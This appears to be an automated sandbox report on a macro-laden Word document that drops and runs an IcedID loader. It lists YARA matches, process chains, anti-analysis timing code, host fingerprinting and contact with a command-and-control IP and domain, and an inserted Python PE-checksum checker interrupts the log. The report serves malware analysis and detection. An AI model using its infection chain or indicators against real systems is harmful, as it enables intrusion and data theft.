Source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_IcedID_0b62e783 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 2f473fbe6338d9663808f1a3615cf8f0f6f9780fbce8f4a3c24f0ddc5f43dd4a, id = 0b62e783-5c1a-4377-8338-1c53194b8d01, last_modified = 2022-06-09
Source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_IcedID_91562d18 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 024bbd15da6bc759e321779881b466b500f6364a1d67bbfdc950aedccbfbc022, id = 91562d18-28a1-4349-9e4b-92ad165510c9, last_modified = 2022-06-09
Source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_IcedID_48029e37 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 375266b526fe14354550d000d3a10dde3f6a85e11f4ba5cab14d9e1f878de51e, id = 48029e37-b392-4d53-b0de-2079f6a8a9d9, last_modified = 2022-06-09
Source: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_IcedID_0b62e783 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 2f473fbe6338d9663808f1a3615cf8f0f6f9780fbce8f4a3c24f0ddc5f43dd4a, id = 0b62e783-5c1a-4377-8338-1c53194b8d01, last_modified = 2022-06-09
Source: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_IcedID_91562d18 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 024bbd15da6bc759e321779881b466b500f6364a1d67bbfdc950aedccbfbc022, id = 91562d18-28a1-4349-9e4b-92ad165510c9, last_modified = 2022-06-09
Source: 00000005.00000002.946706838.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_IcedID_48029e37 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 375266b526fe14354550d000d3a10dde3f6a85e11f4ba5cab14d9e1f878de51e, id = 48029e37-b392-4d53-b0de-2079f6a8a9d9, last_modified = 2022-06-09
Source: 00000005.00000002.946709887.0000000180004000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
Source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
Source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_IcedID_0b62e783 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 2f473fbe6338d9663808f1a3615cf8f0f6f9780fbce8f4a3c24f0ddc5f43dd4a, id = 0b62e783-5c1a-4377-8338-1c53194b8d01, last_modified = 2022-06-09
Source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_IcedID_91562d18 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 024bbd15da6bc759e321779881b466b500f6364a1d67bbfdc950aedccbfbc022, id = 91562d18-28a1-4349-9e4b-92ad165510c9, last_modified = 2022-06-09
Source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_IcedID_48029e37 reference_sample = b9fb0a4c28613c556fb67a0b0e7c9d4c1236b60a161ad935e7387aec5911413a, os = windows, severity = x86, creation_date = 2022-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 375266b526fe14354550d000d3a10dde3f6a85e11f4ba5cab14d9e1f878de51e, id = 48029e37-b392-4d53-b0de-2079f6a8a9d9, last_modified = 2022-06-09
Source: Process Memory Space: rundll32.exe PID: 1552, type: MEMORYSTR Matched rule: Windows_Trojan_IcedID_11d24d35 reference_sample = b8d794f6449669ff2d11bc635490d9efdd1f4e92fcb3be5cdb4b40e4470c0982, os = windows, severity = x86, creation_date = 2022-02-16, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.IcedID, fingerprint = 155e5df0f3f598cdc21e5c85bcf21c1574ae6788d5f7e0058be823c71d06c21e, id = 11d24d35-6bff-4fac-83d8-4d152aa0be57, last_modified = 2022-04-06
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_00000001800024FC 5_2_00000001800024FC
Source: dodsonimaging,file,08.11.2022.doc OLE, VBA macro line: Private Sub Document_Open()
Source: ~DF4786325F45128C5F.TMP.0.dr OLE, VBA macro line: Private Sub Document_Open()
Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe Code function: 4_2_00041203 HeapSetInformation,NtSetInformationProcess,lstrlenW,LocalAlloc,SetErrorMode,DestroyWindow,FreeLibrary,LocalFree,LocalFree,ExitProcess, 4_2_00041203
Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe Code function: 4_2_00041A33 NtOpenProcessToken,NtClose, 4_2_00041A33
Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe Code function: 4_2_00041A8C NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken, 4_2_00041A8C
Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe Code function: 4_2_000419E3 NtOpenProcessToken,NtSetInformationToken,NtClose, 4_2_000419E3
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000007FEF74D5FE6 NtCreateSection,NtMapViewOfSection, 5_2_000007FEF74D5FE6
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000007FEF74D5FF9 NtCreateSection, 5_2_000007FEF74D5FF9
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018000108C LoadLibraryA,GetProcAddress,NtQuerySystemInformation,GetProcessHeap,HeapReAlloc,RtlAllocateHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 5_2_000000018000108C
Source: ~WRF{4D32FA97-2F49-4AD6-98C8-F0676ED8CFE3}.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DF4786325F45128C5F.TMP.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: loader_p3_dll_64_n3_crypt_x64_asm_clone_n152[1].dll.0.dr Static PE information: No import functions for PE file found
Source: y84FE.tmp.dll.0.dr Static PE information: No import functions for PE file found
Source: r8F8A.tmp.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: r8F8A.tmp.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: r8F8A.tmp.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: dodsonimaging,file,08.11.2022.doc OLE indicator, VBA macros: true
Source: ~DF4786325F45128C5F.TMP.0.dr OLE indicator, VBA macros: true
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe 5AD3C37E6F2B9DB3EE8B5AEEDC474645DE90C66E3D95F8620C48102F1EBA4124
Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe Memory allocated: 77620000 page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe Memory allocated: 77740000 page execute and read and write Jump to behavior
Source: dodsonimaging,file,08.11.2022.doc Virustotal: Detection: 26%
Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe "C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe" "C:\Users\user\AppData\Local\Temp\y84FE.tmp.dll",#1
Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe Process created: C:\Windows\System32\rundll32.exe "C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe" "C:\Users\user\AppData\Local\Temp\y84FE.tmp.dll",#1
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe "C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe" "C:\Users\user\AppData\Local\Temp\y84FE.tmp.dll",#1 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe Process created: C:\Windows\System32\rundll32.exe "C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe" "C:\Users\user\AppData\Local\Temp\y84FE.tmp.dll",#1 Jump to behavior
Source: dodsonimaging,file,08.11.2022.LNK.0.dr LNK file: ..\..\..\..\..\Desktop\dodsonimaging,file,08.11.2022.doc
Source: dodsonimaging,file,08.11.2022.doc OLE indicator, Word Document stream: true
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$dsonimaging,file,08.11.2022.doc Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVR6B5F.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winDOC@5/14@2/2
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe Code function: 4_2_000414BD LoadLibraryExW,RtlImageNtHeader,SetProcessDEPPolicy,GetLastError,FormatMessageW, 4_2_000414BD
Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe Process created: C:\Windows\System32\rundll32.exe "C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe" "C:\Users\user\AppData\Local\Temp\y84FE.tmp.dll",#1
Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe Command line argument: RunDLL 4_2_00041203
Source: dodsonimaging,file,08.11.2022.doc OLE document summary: title field not present or empty
Source: dodsonimaging,file,08.11.2022.doc OLE document summary: author field not present or empty
Source: dodsonimaging,file,08.11.2022.doc OLE document summary: edited time not present or 0
Source: ~WRF{4D32FA97-2F49-4AD6-98C8-F0676ED8CFE3}.tmp.0.dr OLE document summary: title field not present or empty
Source: ~WRF{4D32FA97-2F49-4AD6-98C8-F0676ED8CFE3}.tmp.0.dr OLE document summary: author field not present or empty
Source: ~WRF{4D32FA97-2F49-4AD6-98C8-F0676ED8CFE3}.tmp.0.dr OLE document summary: edited time not present or 0
Source: ~DF4786325F45128C5F.TMP.0.dr OLE document summary: title field not present or empty
Source: ~DF4786325F45128C5F.TMP.0.dr OLE document summary: author field not present or empty
Source: ~DF4786325F45128C5F.TMP.0.dr OLE document summary: edited time not present or 0
Source: C:\Windows\System32\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: dodsonimaging,file,08.11.2022.doc Initial sample: OLE zip file path = docProps/custom.xml
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: dodsonimaging,file,08.11.2022.doc Static file information: File size 2298458 > 1048576
Source: Binary string: rundll32.pdb source: r8F8A.tmp.exe, r8F8A.tmp.exe, 00000004.00000000.924645726.0000000000041000.00000020.00000001.01000000.00000003.sdmp, r8F8A.tmp.exe, 00000004.00000002.947175300.0000000000041000.00000020.00000001.01000000.00000003.sdmp, r8F8A.tmp.exe.0.dr
Source: ~WRF{4D32FA97-2F49-4AD6-98C8-F0676ED8CFE3}.tmp.0.dr Initial sample: OLE indicators vbamacros = False
Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe Code function: 4_2_000419CA push ecx; ret 4_2_000419DD
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000007FEF74D8BC2 push rax; ret 5_2_000007FEF74D8BDE
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000007FEF74D610E push rdx; ret 5_2_000007FEF74D611B
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018000108C LoadLibraryA,GetProcAddress,NtQuerySystemInformation,GetProcessHeap,HeapReAlloc,RtlAllocateHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 5_2_000000018000108C
Source: loader_p3_dll_64_n3_crypt_x64_asm_clone_n152[1].dll.0.dr Static PE information: real checksum: 0x59d91 should be: 0x5f194
Source: y84FE.tmp.dll.0.dr Static PE information: real checksum: 0x59d91 should be: 0x5f194
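Both copies of the loader DLL carry a CheckSum header value (0x59d91) that no longer matches the image (0x5f194), which is what a linker-produced file looks like after something wrote over it. The function below is an added example, not code from the sandbox or the report, that recomputes the PE image checksum the way CheckSumMappedFile does (ones'-complement sum of the file excluding the CheckSum field itself, folded to 16 bits, plus the file length) and compares it with the stored value. The 512-byte PE32+ header-only image it tests against is constructed inline; it is not the sample from this report, and the expected checksum in the test belongs to that synthetic image only.

```python
import struct


def _checksum_offset(data):
    """Offset of IMAGE_OPTIONAL_HEADER.CheckSum: e_lfanew + 4 (signature)
    + 20 (COFF header) + 64; the field sits at the same place in PE32 and PE32+."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    return e_lfanew + 4 + 20 + 64


def pe_checksum(data):
    """Recompute the image checksum as CheckSumMappedFile does."""
    skip = _checksum_offset(data)  # e_lfanew is 4-byte aligned in valid images, so this is a word boundary
    padded = bytes(data) + b"\0" * (-len(data) % 4)
    total = 0
    for off in range(0, len(padded), 4):
        if off == skip:
            continue  # the CheckSum field itself is not part of the sum
        total += struct.unpack_from("<I", padded, off)[0]
        total = (total & 0xFFFFFFFF) + (total >> 32)  # end-around carry
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return ((total & 0xFFFF) + len(data)) & 0xFFFFFFFF


def checksum_status(data):
    """Return (stored, computed, matches) for a PE file image."""
    stored = struct.unpack_from("<I", data, _checksum_offset(data))[0]
    computed = pe_checksum(data)
    return stored, computed, stored == computed


def build_minimal_pe(stored_checksum=0):
    """Constructed 512-byte PE32+ header-only image used only to exercise the code."""
    img = bytearray(512)
    img[0:2] = b"MZ"
    struct.pack_into("<I", img, 0x3C, 0x80)             # e_lfanew
    img[0x80:0x84] = b"PE\0\0"
    struct.pack_into("<HH", img, 0x84, 0x8664, 0)       # Machine = AMD64, NumberOfSections = 0
    struct.pack_into("<HH", img, 0x94, 0xF0, 0x2022)    # SizeOfOptionalHeader; EXECUTABLE|LARGE_ADDRESS_AWARE|DLL
    struct.pack_into("<H", img, 0x98, 0x20B)            # PE32+ magic
    struct.pack_into("<I", img, 0xD8, stored_checksum)  # CheckSum at optional header + 64
    return bytes(img)


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_minimal_pe(0x59D91)
    stored, computed, ok = checksum_status(data)
    print(f"stored 0x{stored:x} computed 0x{computed:x} -> {'ok' if ok else 'MISMATCH'}")
```

One caveat when reading this finding: Windows only enforces the CheckSum field for kernel-mode images, so a user-mode DLL with a wrong value still loads. The mismatch is therefore not a defect in the payload but evidence that the file was modified after linking, which fits the empty import table reported for the same two files.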
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader_p3_dll_64_n3_crypt_x64_asm_clone_n152[1].dll Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\y84FE.tmp.dll Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

Source: C:\Windows\System32\rundll32.exe RDTSC instruction interceptor: First address: 0000000180002AE1 second address: 0000000180002B06 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec esp 0x0000000a mov eax, eax 0x0000000c xor ecx, ecx 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 mov dword ptr [esp+20h], eax 0x00000019 mov dword ptr [esp+24h], ebx 0x0000001d mov dword ptr [esp+28h], ecx 0x00000021 mov dword ptr [esp+2Ch], edx 0x00000025 rdtsc
Source: C:\Windows\System32\rundll32.exe RDTSC instruction interceptor: First address: 0000000180002B1B second address: 0000000180002B28 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 nop 0x00000007 dec eax 0x00000008 or eax, edx 0x0000000a dec eax 0x0000000b mov ecx, eax 0x0000000d rdtsc
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180002AC0 SwitchToThread,SwitchToThread, 5_2_0000000180002AC0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader_p3_dll_64_n3_crypt_x64_asm_clone_n152[1].dll Jump to dropped file
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180002174 rdtsc 5_2_0000000180002174
Source: C:\Windows\System32\rundll32.exe Code function: LoadLibraryA,GetProcAddress,GetAdaptersInfo,GetProcessHeap,HeapAlloc,GetAdaptersInfo,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 5_2_000000018000133C
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_000000018000108C LoadLibraryA,GetProcAddress,NtQuerySystemInformation,GetProcessHeap,HeapReAlloc,RtlAllocateHeap,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 5_2_000000018000108C
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180001C28 GetComputerNameExW,LookupAccountNameW,GetLastError,GetProcessHeap,HeapAlloc,LookupAccountNameW,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree, 5_2_0000000180001C28
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180002174 rdtsc 5_2_0000000180002174
Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe Code function: 4_2_00041189 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 4_2_00041189

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\rundll32.exe Network Connect: 64.227.108.27 80
Source: C:\Windows\System32\rundll32.exe Domain query: alexbionka.com
Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe Process created: C:\Windows\System32\rundll32.exe "C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe" "C:\Users\user\AppData\Local\Temp\y84FE.tmp.dll",#1
Source: C:\Windows\System32\rundll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\AppData\Local\Temp\r8F8A.tmp.exe Code function: 4_2_00041593 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 4_2_00041593
Source: C:\Windows\System32\rundll32.exe Code function: 5_2_0000000180002018 GetComputerNameExW,GetUserNameW,wsprintfW,wsprintfW,wsprintfW, 5_2_0000000180002018

Stealing of Sensitive Information

Source: Yara match File source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 1552, type: MEMORYSTR
Source: Yara match File source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPE

Remote Access Functionality

Source: Yara match File source: 5.2.rundll32.exe.46ab18.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.946534785.000000000045E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 1552, type: MEMORYSTR
Source: Yara match File source: 5.2.rundll32.exe.180000000.1.unpack, type: UNPACKEDPE